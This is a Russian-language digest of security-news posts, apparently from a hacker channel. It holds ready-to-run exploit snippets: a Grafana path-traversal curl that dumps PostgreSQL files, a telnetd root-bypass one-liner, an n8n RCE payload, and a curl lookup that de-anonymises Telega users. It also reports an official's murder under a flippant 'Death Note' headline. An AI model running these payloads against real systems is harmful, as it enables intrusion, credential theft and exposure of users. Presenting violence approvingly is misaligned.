Дампим PostgreSQL с помощью Path Traversal

Наткнулся на гайд то, как восстановить "убитую" базу данных PostgreSQL. Его суть сводится к тому, что все данные лежат на файловой системе, и все можно довольно легко раскрутить от главного файла global/1262 (pg_database).

Его идентификатор (oid) всегда статический, и это удобно — можно легко достать с помощью Path Traversal. Вот так, на примере CVE-2021-43798 в Grafana:

curl --path-as-is -O http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../var/lib/postgresql/data/global/1262 

А затем, с помощью него и двух бинарей с отношениями и типами данных, base/<db_oid>/1259 и base/<db_oid>/1249 (у каждой базы свой db_oid, его можно достать из pg_database), легко восстановить и содержимое всей базы данных.

С помощью pg_filedump

./pg_filedump -D int,bool,text,timestamp /path/to/db/base/16384/16393

или специальной утилиты pgread, которая автоматизирует рутину

./pgread -passwords all
PostgreSQL Password Hashes:
===========================
pg_database_owner:(no password)
admin:SCRAM-SHA-256$4096:salt$hash:proof [SUPERUSER] [LOGIN]

Что самое главное — не понадобились никакие креды, чтобы сдампить базу.

Еще даже не успели присвоить CVE

В telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля.

Под ударом практически все дистрибутивы Linux, которые ставят inetutils-telnetd из репозиториев:
— Debian / Ubuntu / Kali / Trisquel и производные
— Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet

Shodan сейчас находит 732,350 устройств по всему миру.
А чтобы эксплуатировать, достаточно одной команды:

$ USER="-f root" telnet -a IP PORT

UPD.: присвоили https://nvd.nist.gov/vuln/detail/CVE-2026-24061

Это Кира, только без тетради

Прямо в проходной здания Роскомнадзора в Москве убит высокопоставленный сотрудник ведомства Алексей Беляев — он отвечал за блокировки сайтов и замедление трафика.

Убийство произошло 19 января: 16-летний школьник Артём ударил чиновника ножом в грудь, когда тот выходил из офиса.

Беляев работал в Роскомнадзоре больше 10 лет, на момент смерти — замначальника отдела контроля и надзора в сфере связи. Этот отдел отвечает за:
— установку и контроль «чёрных ящиков» (ТСПУ), через которые РКН напрямую блокирует YouTube, Discord, VPN и т.д.;
— мониторинг фильтрации трафика и штрафы провайдерам, если запрещённые сайты всё же открываются;
— поиск и блокировку зеркал заблокированных ресурсов;
— замедление трафика для ещё не полностью заблокированных сайтов;

Серия и номер паспорта стали недействительны 19 января 2026 года (в день смерти), а зарплата сотрудника, согласно утечкам, составляла 135 тысяч рублей в месяц.

Как не потерять все

Есть железная схема с тремя копиями:
1. Рабочая (которую используешь каждый день)
2. Локальная (чтобы быстро восстановиться)
3. Удалённая (если сгорела хата)

Хранишь все свои данные на ПК, синкаешь самое важное с NAS или просто внешним диском, и отдельно выгружаешь в облако.

Но какое облако выбрать? В таблице собраны все облачные хранилища, у которых есть lifetime-подписка — один раз платишь и получаешь доступ на всю жизнь.

У каждого есть свои нюансы, — один говорит о "пожизненном доступе" компании, а не тебя, другой удалит все твои файлы через 3 года, если туда не заходить. Здесь все описано, как и самые надежные сервисы, которые выделены зеленым.

Советую сохранить пост, чтобы не потерять. Окупается такое облако примерно за 5 лет, а перед выгрузкой нужно не забыть все зашифровать, например, с помощью Cryptomator.

🔥 [10/10] CVE-2026-25049: RCE в n8n

Это обход для всех предыдущих патчей. Уязвимость позволяет выполнять произвольные команды на сервере.

Уязвимы версии:
— <1.123.17 (исправлено в 1.123.17)
— <2.5.2 (исправлено в 2.5.2)

PoC
1. Создаем workflow
2. Добавляем Edit Field
3. Указываем в String (Expression)

{{(() => {
    const { [`constr${'uct'}or`]: Fn } = Object;
    const payload = "return process.mainModule.require('child_process').execSync('cat /etc/passwd').toString();";
    return Fn(payload)();
})()}}

4. Нажимаем Execute Step

https://github.com/bytewreck/DumpGuard

На последних версиях Windows, mimikatz становится бесполезным, когда ты пытаешься сдампить LSASS. Это происходит, так как в LSASS ничего ценного больше не остается, ведь все секреты хранятся в отдельном защищённом процессе lsaiso.exe — этот механизм защиты называется Credential Guard, и он включен по умолчанию, начиная с с 22H2 / Server 2025.

Эта утилита позволяет "обойти" его с помощью Remote Credential Guard, который обычно используется при RDP-сессиях, чтобы не передавать секреты на удалённый сервер, — и получить все NTLMv1 хэши, не смотря на включенную защиту.

Red Team Infrastructure The Full Picture

Это самый полный гайд в 2026 году по созданию современной, устойчивой и максимально скрытой инфраструктуры для Red Team, — начиная от покупки домена, заканчивая получением отстуков.

Сегодня недостаточно просто купить VDS и поднять там C2 из коробки, — такие серверы быстро найти, а получить бан можно уже через 30 секунд после запуска.

Для того, чтобы этого не случилось, надо поднять инфру, которая замаскирует тебя и твой сервер. Чем автор и поделился — в статье он рассказывает о том, как сделать это максимально эффективно, а именно:
— подготовить прогретый домен
— настроить CDN Relay через Microsoft / AWS / Google
— поднять Redirector с многослойной фильтрацией
— сконфигурировать Malleable-профиль и изолировать Team Server

Бонусом он добавил про поднятие инфраструктуры для фишинга с нуля. Отдельно еще советую отдельную статью о том, как это можно все автоматизировать с помощью Terraform.

Выложили доклады с конференции DEF CON 33. Она прошла в Лас-Вегасе и оказалась одной из самых крупных DEF CON за всю историю — конференцию посетили около 26 000 человек, а на YouTube уже опубликовано более 350(!) видео.

Среди них много докладов на самые разные темы — от классического веба и hardware-хакинга (и куда же без AI) до совсем неожиданных направлений: гайда по отмыванию средств с помощью криптовалюты, современного подхода к кардингу и взлома физических замков в отелях.

Один из участников, даже не смотря на угрозы судом, рассказал, как ему удалось разреверсить современные морские двигатели, найти способ удаленно менять их мощность, и перехватывать управление.

Собрал пару интересных тем, чтобы ты мог оценить для себя:
1. Exploiting Security Side Channels in E2E Encrypted Msngrs
2. Mapping the Shadow War From Estonia to Ukraine
3. Infecting the Boot to Own the Kernel
4. New Red Team Networking Techniques for Initial Access and Evasion
5. Breakin 'Em All – Overcoming Pokemon Go's Anti Cheat Mechanism
6. BitUnlocker: Leverage Windows Recovery to Extract BitLocker Secrets
7. Turning Microsoft's Login Page into our Phishing Infrastructure
8. Tactical Flipper Zero You Have 1 Hour and No Other Equipment
9. How malicious packages on npm bypass existing security tools
10. TSPU: Russia's Firewall and Defending Against Digital Repression

Полный плейлист со всеми докладами тут.

CrackArmor

Ресерчеры из Qualys дропнули отчёт о девяти уязвимостях, которые им удалось найти в AppArmor — системе безопасности Linux, которая по умолчанию включена в Ubuntu, Debian и SUSE.

Главное, что нужно знать — баги затрагивают все версии ядра Linux начиная с версии 4.11 (2017 год) и позволяют создавать/удалять профили AppArmor, а также повышаться до рута.

PoC

Основная уязвимость — это Confused Deputy, который заключается в том, что файлы AppArmor (.load, .replace, .remove) может открыть любой пользователь, но писать в них может только привилегированный процесс. С помощью su --pty любой пользователь может перенаправить stdout su прямо в эти файлы — и скормить ему нужные данные через PTY.

Благодаря этому, мы можем загружать свои политики — и добраться до root тремя способами:

1. Sudo + Postfix — загружаем профиль, который запрещает CAP_SETUID для sudo. sudo ломается, пытается уведомить администратора по почте, но не может сбросить привилегии перед запуском sendmail — и запускает его от root с переменными окружениями атакующего.

2. Use-after-free — баг в парсере ядра позволяет обратиться к уже освобождённой памяти. Через манипуляции с page table страница /etc/passwd становится записываемой — убираем пароль root и заходим через su.

3. Double-free — двойное освобождение памяти при парсинге профиля. Через цепочку манипуляций с памятью ядра перезаписываем uid прямо в структуре cred процесса — и получаем root.

RegPwn (CVE-2026-24291)

LPE с помощью Windows Accessibility features. Про уязвимость рассказали парни из MDSec, которые использовали ее как 0day с января 2025 года.

Главная особенность в том, что индикаторы компрометации минимальны и практически неотличимы от легитимной активности. Нет создания новых файлов, запуска подозрительных бинарей или необычных процессов.

Всё происходит внутри встроенных фичей Windows Accessibility, типа экранной клавиатуры. А изменения в реестре, которые выполняет эксплоит, выглядят как обычная настройка и применений опций пользователем.

Затрагивает
— Windows Server 2016/2019/2022/2025
— Windows 11
— Windows 10

exploit

А мы и не думали

Клиент Telega, который используют россияне, чтобы "обходить" блокировку Telegram, перехватывает весь трафик. Более того, существует админка, из которой можно мониторить весь флоу переписок.

Технически это работает так — вместо заблокированных IP-адресов Telegram, в клиент вшит IP-адрес и публичный ключ датацентра, предположительно, от VK.

Этот dc-proxy контролирует хэндшейк. Именно он договаривается с клиентом об одном ключе шифрования, а с настоящим сервером Telegram о другом ключе шифрования. Будучи посередине между клиентом и сервером, он может просматривать, сохранять и модифицировать весь трафик.

Благодаря этому, сотрудники Telega могут:
— читать все входящие и исходящие сообщения в любом чате;
— просматривать всю историю сообщений в любом чате;
— подменять контент сообщений — например, блокировать неугодные каналы по причине “нарушения правил Telegram” (не Telega!);
— хранить все ваши данные и действия в Telegram и передавать их третьим лицам
— выполнять абсолютно любые действия с вашим аккаунтом без вашего участия.

Причем могут они это делать не теоретически, а вполне реально. Существуют, как минимум, две админки:
1. Zeus — позволяет блокировать любой ресурс для клиента
2. Сerberus — из нее можно в реальном времени смотреть/удалять флоу общения

Обе они были доступны в интернете, и теперь посмотреть демку можно тут.

Количество скачиваний клиента на данный момент перевалило за 5млн. в Google Play. На сегодня это одно из самых популярных spyware, который почему-то ещё до сих пор не снесли из магазина.

Надо отметить, что любой с этим клиентом представляет угрозу. И если ты думаешь, что в твоем окружении таких людей нет, то вспомни о каком-нибудь приватной группе или канале — вступил хотя бы один пользователь Telega, и такой чат уже скомпрометирован.

Нашелся даже способ, чтобы это проверить. Tg ID маппятся к какому-то внутреннему идентификатору VK, и маппинг можно чекнуть с помощью незадокументированного метода в calls.okcdn.ru. На вход подается Tg ID, а в ответе нужно искать ok_user_id, — если есть, пользователь использовал Telega.

Пример

curl -X POST "https://calls.okcdn.ru/api/vchat/getOkIdsByExternalIds" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode "application_key=CHKIPMKGDIHBABABA" \
  --data-urlencode "session_key=<SESSION_KEY>" \
  --data-urlencode "externalIds=[{\"id\":\"1363800669\",\"ok_anonym\":false}]"

сессионный ключ надо заранее получить так.

Только среди первых 8.5кк id удалось спарсить более 800 пользователей

На Github даже кто-то написал бота, который после вступления кикает пользователя из чата, если тот есть в Telega. Но он бесполезный, так как есть гап между моментом вступления и удаления, из-за которого можно успеть прочитать чат.

Единственный способ защититься — создать частную группу с ручным одобрением заявок на вступление и проверять пользователей до того, как они оказались в чате.